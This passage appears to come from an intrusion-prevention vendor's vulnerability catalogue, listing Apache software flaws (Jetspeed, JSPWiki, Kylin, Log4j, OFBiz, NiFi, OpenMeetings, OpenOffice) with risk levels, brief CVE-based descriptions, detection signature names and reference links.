Apache-Jetspeed-Rest-API-Unauthorized-User-Modification

About this vulnerability: Apache Jetspeed Rest API Unauthorized User Modification vulnerability
Risk: High
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Jetspeed
Type: Insecure Configuration
Description: The Apache Jetspeed User Manager service, versions before 2.3.1, allows remote attackers to add, edit, or delete users via the REST API due to improper access restriction.
Situation: HTTP_CSU-Apache-Jetspeed-Rest-API-Unauthorized-User-Modification
References:
CVE-2016-2171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2171
Back to top

Apache-Jetspeed-SQL-Injection

About this vulnerability: An Apache Jetspeed SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Jetspeed
Type: SQL Injection
Description: A vulnerability in Apache Jetspeed, versions before 2.3.1, which allows remote attackers to execute arbitrary SQL commands via the role or user parameter in services/usermanager/users/.
Situation: HTTP_CRL-Apache-Jetspeed-SQL-Injection
References:
CVE-2016-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0710
Back to top

Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation JSPWiki
Risk: Moderate
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Platform: Generic
Software: Apache Software Foundation JSPWiki
Type: Input Validation
Description: Improper input validation in the AJAXPreview.jsp endpoint causes a cross-site scripting vulnerability in Apache JSPwiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting
References:
CVE-2022-28730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28730
Back to top

Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation JSPWiki
Risk: Moderate
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Platform: Generic
Software: Apache Software Foundation JSPWiki
Type: Input Validation
Description: Improper input validation in the Upload page causes a cross-site scripting vulnerability in Apache JSPWiki. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CS-Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting
References:
CVE-2024-27136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27136
Back to top

Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Apache Software Foundation JSPWiki
Risk: Moderate
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Apache Software Foundation JSPWiki
Type: Malfunction
Description: Apache JSPWiki has a design flaw that allows user profile changes without a password or CSRF token. A successful exploit allows an attacker to access data by sending password change requests to a changes user email address.
Situation: HTTP_CSU-Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
File-Text_Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
References:
CVE-2022-28731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28731
Back to top

Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation JSPWiki
Risk: High
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1514-5242
Platform: Generic
Software: Apache Software Foundation JSPWiki
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Apache JSPWiki. This vulnerability is due to improper input validation for the WeblogPlugin. A remote, unauthenticated attacker can exploit this vulnerability by by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user's browser.
Situation: HTTP_CRL-Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting
References:
CVE-2022-28732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28732
Back to top

Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation JSPWiki
Risk: Moderate
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Apache Software Foundation JSPWiki
Type: Input Validation
Description: Improper input validation on the input to the XHRHtml2Markup.jsp endpoint causes a cross-site scripting vulnerability in Apache JSPWiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting
References:
CVE-2022-27166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27166
Back to top

Apache-Kylin-Getsparksubmitcmd-Command-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Kylin
Risk: Moderate
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Platform: Generic
Software: Apache Kylin
Type: Malfunction
Description: A command injection vulnerability has been reported in Apache Kylin. The vulnerability is due to the cube configuration item "kylin.engine.spark-cmd" allowing attackers to set and execute arbitrary commands when building cubes. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the user running the application.
Situation: File-Text_Apache-Kylin-Getsparksubmitcmd-Command-Injection
References:
CVE-2022-43396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43396
Back to top

Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation Kylin
Risk: Moderate
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: Apache Kylin
Type: Malfunction
Description: Improper access control for a specific REST API causes an information disclosure vulnerability in Apache Kylin. A successful exploit allows an attacker to access information on the target system.
Situation: HTTP_CS-Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure
References:
CVE-2020-13937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13937
Back to top

Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection

About this vulnerability: A vulnerability in Apache Kylin
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Kylin
Type: Input Validation
Description: Improper validation of request parameters causes a command injection vulnerability in Apache Kylin. A successful exploit may allow an attacker to execute arbitrary commands on the target system with the privileges of the affected process.
Situation: HTTP_CSU-Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection
References:
CVE-2020-13925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13925
Back to top

Apache-Kylin-Rest-API-Migratecube-Command-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Kylin
Risk: High
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Kylin
Type: Input Validation
Description: A command injection vulnerability has been reported in Apache Kylin project. The vulnerability is due to insufficient validation of the user-supplied input to migrate REST API endpoint. A remote unauthenticated attacker could exploit this vulnerability by sending malicious requests to vulnerable REST APIs in Apache Kylin. A successful attack may result in arbitrary command execution in the context of the server process.
Situation: HTTP_CRL-Apache-Kylin-Rest-API-Migratecube-Command-Injection
File-Text_Apache-Kylin-Rest-API-Migratecube-Command-Injection
References:
CVE-2020-1956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1956
Back to top

Apache-Kylin-Runsparksubmit-Command-Injection

About this vulnerability: A vulnerability in Apache Kylin
Risk: Moderate
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Platform: Generic
Software: Apache Kylin
Type: Input Validation
Description: Improper input validation when overwriting system parameters in cube configurations submitted to the server causes a command injection vulnerability in Apache Kylin. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Apache-Kylin-Runsparksubmit-Command-Injection
References:
CVE-2022-24697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24697
Back to top

Apache-Log4j-JDBC-Appender-JNDI-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Log4j
Risk: High
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Platform: Generic
Software: Apache Software Foundation Log4j
Type: Malfunction
Description: A JNDI Injection vulnerability has been reported in Apache Log4j. This vulnerability is due to improper restriction of JNDI data source names provided via the JDBC Appender configuration. A remote attacker who can control the contents of the Log4j configuration file can exploit this vulnerability by adding a malicious JDBC Appender to the configuration file. Successful exploitation results in the target server making a JNDI lookup request to an attacker-controlled server, which may lead to the execution of arbitrary code under the security context of the affected server.
Situation: File-Text_Apache-Log4j-JDBC-Appender-JNDI-Injection
File-TextId_Apache-Log4j-JDBC-Appender-JNDI-Injection
References:
CVE-2021-44832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832
Back to top

Apache-Log4j-SocketServer-Untrusted-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation Log4j
Risk: High
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation Log4j
Type: Input Validation
Description: There exists a vulnerability in the SocketServer class of Apache Software Foundation Log4j, versions 1.2 to 1.2.17, which allows remote attackers to execute arbitrary code by sending a specially crafted serialized object to the target system, due to the lack of a configurable class filter in the SocketServer and SocketNode classes.
Situation: Generic_CS-Apache-Log4j-SocketServer-Untrusted-Deserialization
References:
CVE-2019-17571
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17571
Back to top

Apache-Mod-Imagemap-Module-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: Apache
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Apache mod_imap and mod_imagemap Module. The flaw is due to a lack of validation of user-supplied input data. The flaw may be exploited by malicious users to execute arbitrary HTML code on the target user's web browser, in the context of a trusted web site.
Situation: HTTP_CSU-Script-Tag-In-URI
References:
CVE-2007-5000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5000
BID-26838
http://www.securityfocus.com/bid/26838
OSVDB-39134
http://www.osvdb.org/39134
Back to top

Apache-Mod-Include-Buffer-Overflow

About this vulnerability: A vulnerability in Apache
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Buffer Overflow
Description: A vulnerability exists in the Apache web server's Server Side Includes (SSI) functionality. A specially crafted file can trigger a memory buffer overflow. This condition allows a malicious user to stage an attack which may result in arbitrary code execution on the vulnerable system with the privileges of the Apache process.
Situation: File-Text_Apache-Mod-Include-Buffer-Overflow
References:
CVE-2004-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940
BID-11471
http://www.securityfocus.com/bid/11471
Back to top

Apache-Mod-Ssl-Log-Function-Format-String

About this vulnerability: Apache mod_ssl module is vulnerable to a format string attack
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Format String
Description: The mod_ssl authentication module version 2.8.18 and earlier for Apache HTTP Server is vulnerable to a format string attack. This is caused by a vulnerability in the ssl_log function within the mod_proxy hook functions. A remote attacker could exploit this vulnerability to gain access to the system.
Situation: HTTP_CSU-Apache-SSL-Proxy-Vulnerability
HTTP8080_Apache-SSL-Proxy-Vulnerability
References:
CVE-2004-0700
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0700
BID-10736
http://www.securityfocus.com/bid/10736
OSVDB-7929
http://www.osvdb.org/7929
Back to top

Apache-Mod_Auth_Pgsql-Module-Logging-Facility-Format-String-Errors

About this vulnerability: A vulnerability in Giuseppe Tanzilli mod_auth_pgsql module
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Mod_auth_pgsql
Type: Format String
Description: Numerous format string vulnerabilities exist in the logging facility of the Apache mod_auth_pgsql module. The flaws are caused by the improper use of format strings contained in user supplied data. This vulnerability may be exploited by unauthenticated users to inject and execute arbitrary code. In a simple attack exploiting this vulnerability, the httpd process serving the attacker terminates, closing the connection as a result. This might also reset other connections served by the affected httpd process, in the case the HTTP server is configured to run in multiple-threading mode. In the case of a more sophisticated attack, the injected arbitrary code is executed with the privileges of the httpd process. The behaviour of the target system will be dependent on the malicious code.
Situation: HTTP_CSH-Basic-Authentication-Username-Contains-Format-String-Characters
References:
CVE-2005-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3656
BID-16153
http://www.securityfocus.com/bid/16153
Back to top

Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Buffer Overflow
Description: There is a vulnerability in the mod_ssl module of Apache 2.0, which is used for handling SSL connections. This module mod_ssl, contains a stack-based buffer overflow when handling client certificates. A malicious attacker may use this vulnerability to trigger a denial of service attack without a crafted client certificate signed by a trusted CA (Certificate Authority). As noted in section 4.1, with some compiled Apache versions, the server may be protected because the local stack is, by accident, sufficiently large. In general, a buffer overflow can potentially crash the process that is servicing HTTPS request. Depending on the target machine's Apache configuration, this may cause a denial of service. Because the data overflowing the buffer is uuencoded, exploiting this vulnerability to perform remote code execution would be extremely difficult or impossible.
Situation: HTTPS_CS-Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability
References:
CVE-2004-0488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0488
BID-10355
http://www.securityfocus.com/bid/10355
Back to top

Apache-NiFi-API-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache NiFi.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Unix; Windows
Software: Apache NiFi
Type: Input Validation
Description: A vulnerability in Apache NiFi, version 1.12.1, which allows remote attackers to execute arbitrary code by allowing the creation of an ExecuteProcess processor configured with a payload.
Situation: HTTP_CS-Apache-NiFi-API-Remote-Code-Execution
Back to top

Apache-NiFi-H2-Connection-String-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Apache NiFi detected
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Linux; Unix
Software: Apache NiFi
Type: Input Validation
Description: A vulnerability in Apache NiFi, versions 0.0.2 through 1.21.0, which allows remote attackers to execute arbitrary code by configuring a Database URL with the H2 driver.
Situation: HTTP_CRL-Apache-NiFi-H2-Connection-String-Remote-Code-Execution
References:
CVE-2023-34468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34468
Back to top

Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation NiFi
Risk: Moderate
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Platform: Generic
Software: Apache NiFi
Type: Input Validation
Description: Improper input validation in the parameter context component causes a stored cross-site scripting vulnerability in Apache NiFi. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting
References:
CVE-2024-37389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37389
Back to top

Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467

About this vulnerability: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Risk: High
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1670-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: The vulnerability in Apache OFBiz allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF).
Situation: HTTP_CRL-Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467
References:
CVE-2023-51467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51467
Back to top

Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: Moderate
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Improper validation of user supplied data causes a server-side template vulnerability in Apache OFBiz. A successful exploit allows an attacker to execute arbitrary code on the server.
Situation: HTTP_CRL-Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection
References:
CVE-2022-25813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25813
Back to top

Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: Moderate
First detected in: sgpkg-ips-1335-5242
Last changed: sgpkg-ips-1335-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Insecure Java deserialization when processing requests causes a vulnerability in Apache OFBiz. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization
References:
CVE-2021-26295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295
Back to top

Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: Moderate
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Insecure deserialization of user-sent data causes a vulnerability in Apache OFBiz. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization
References:
CVE-2021-30128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30128
Back to top

Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: High
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Apache OFBiz. This vulnerability is due to improper validation of XML-RPC requests in an unmaintained library, as well as incomplete patches for past vulnerabilities. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
Situation: File-TextId_Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization
References:
CVE-2023-49070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49070
Back to top

Apache-Ofbiz-CVE-2024-36104-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: Moderate
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Improper validation of URL data in HTTP requests causes a directory traversal vulnerability in Apache OFBiz. A successful exploitation may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Ofbiz-CVE-2024-36104-Directory-Traversal
References:
CVE-2024-36104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36104
Back to top

Apache-Ofbiz-Forgot-Password-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in Apache OFBiz detected
Risk: High
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1742-5242
Platform: Linux; Windows
Software: Apache Software Foundation OFBiz
Type: Directory Traversal
Description: A vulnerability in Apache OFBiz, versions prior to 18.12.13, which allows remote attackers to execute arbitrary code by allowing the access to the ProgramExport endpoint through /webtools/control/forgotPassword.
Situation: HTTP_CSU-Apache-Ofbiz-Forgot-Password-Directory-Traversal
References:
CVE-2024-32113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32113
Back to top

Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065

About this vulnerability: A vulnerability in Apache OFBiz
Risk: High
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Apache OFBiz. This vulnerability is due to improper validation of user input. Successful exploitation would result in the authentication bypass and lead to further possible damages.
Situation: HTTP_CSH-Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065
References:
CVE-2024-25065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25065
Back to top

Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: Moderate
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Improper deserialization of the serviceContext parameter sent to "webtools/control/httpService" URL causes a vulnerability in Apache OFBiz. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization
References:
CVE-2019-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0189
Back to top

Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507

About this vulnerability: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Risk: High
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Malfunction
Description: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected.
Situation: HTTP_CRL-Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507
References:
CVE-2024-45507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45507
Back to top

Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Improper handling of request parameters causes a cross-site scripting vulnerability in Apache OFBiz. A succesful exploit allows an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting
References:
CVE-2020-1943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1943
Back to top

Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-38856

About this vulnerability: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Risk: High
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: Incorrect authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions do not explicitly check user's permissions because they rely on the configuration of their endpoints).
Situation: HTTP_CSU-Apache-Ofbiz-Forgot-Password-Directory-Traversal
References:
CVE-2024-38856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
Back to top

Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195

About this vulnerability: A vulnerability in Apache OFBiz
Risk: Critical
First detected in: sgpkg-ips-1773-5242
Last changed: sgpkg-ips-1774-5242
Platform: Linux; Windows
Software: Apache Software Foundation OFBiz
Type: Malfunction
Description: Incorrect authorization vulnerability exists in Apache OFBiz versions prior to 18.12.16. This vulnerability allows remote attackers to bypass authentication checks and execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
HTTP_CRL-Potential-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
References:
CVE-2024-45195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45195
Back to top

Apache-Ofbiz-XmlRpc-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation OFBiz
Risk: High
First detected in: sgpkg-ips-1273-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation OFBiz
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests sent to "/webtools/control/xmlrpc" URL. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
Situation: File-Text_Apache-Ofbiz-XmlRpc-Insecure-Deserialization
File-TextId_Apache-Ofbiz-XmlRpc-Insecure-Deserialization
References:
CVE-2020-9496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9496
Back to top

Apache-Olingo-XML-External-Entity-Injection

About this vulnerability: A vulnerability in Apache Olingo
Risk: High
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Olingo
Type: Malfunction
Description: There exists a vulnerability in Apache Olingo, versions 4.0.0 through 4.6.0, which allows remote attckers to disclose file content on the target machine by seding a crafted request, do to a failure to configure the de-serialization engine to deny the resolution of external entities.
Situation: HTTP_CS-Apache-Olingo-XML-External-Entity-Injection
References:
CVE-2019-17554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17554
Back to top

Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676

About this vulnerability: A vulnerability in Apache OpenMeetings
Risk: High
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Apache OpenMeetings
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Apache OpenMeetings. This vulnerability is due to insufficient serialization allow list restrictions relating to clustering. A remote attacker could exploit this vulnerability by sending crafted packets to the affected process. Successful exploitation could result in arbitrary code execution under the security context of the target service.
Situation: Generic_CS-Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676
References:
CVE-2024-54676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54676
Back to top

Apache-OpenMeetings-Event-Description-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation OpenMeetings
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache OpenMeetings
Type: Input Validation
Description: A cross-site scripting vulnerability in Apache OpenMeetings can be exploited scheduling an event with a crafted hyperlink. When successfully exploited, the attack allows the attacker to execute arbitrary script code in the context of the user's web browser.
Situation: HTTP_CRL-Apache-OpenMeetings-Event-Description-Cross-Site-Scripting
References:
CVE-2016-2163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2163
Back to top

Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation OpenMeetings
Risk: Moderate
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: Apache OpenMeetings
Type: Malfunction
Description: Improper restrictions on download and upload sizes on the NetTest endpoint causes a denial of service vulnerability in Apache OpenMeetings.
Situation: HTTP_CRL-Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service
References:
CVE-2021-27576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27576
Back to top

Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation OpenMeetings
Risk: Moderate
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Apache OpenMeetings
Type: Malfunction
Description: There exists a denial of service vulnerability in Apache OpenMeetings. Successful exploitation could lead in network exhaustion and denial of service.
Situation: HTTP_CSU-Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service
References:
CVE-2020-13951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13951
Back to top

Apache-OpenMeetings-Zip-File-Path-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation OpenMeetings
Risk: Moderate
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache OpenMeetings
Type: Directory Traversal
Description: Improper validation of paths inside ZIP files allow an attacker to upload files containing code that will be executed with the privileges of the server process.
Situation: File-Zip_Apache-OpenMeetings-Zip-File-Path-Traversal
References:
CVE-2016-0784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0784
Back to top

Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation OpenOffice
Risk: High
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Platform: Generic
Software: Apache OpenOffice
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Apache OpenOffice for Windows. The vulnerability is due a flaw when opening a crafted DBF file with crafted records. A remote attacker could exploit the vulnerability by enticing an user to open a maliciously crafted openoffice file with the affected software. Successful exploitation could result in arbitrary code execution in the context of the user.
Situation: File-Binary_Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow
References:
CVE-2021-33035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33035
Back to top

Apache-OpenOffice-Text-Document-Malicious-Macro-Execution

About this vulnerability: An Apache OpenOffice Text Document Malicious Macro Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Apache OpenOffice
Type: Insecure Configuration
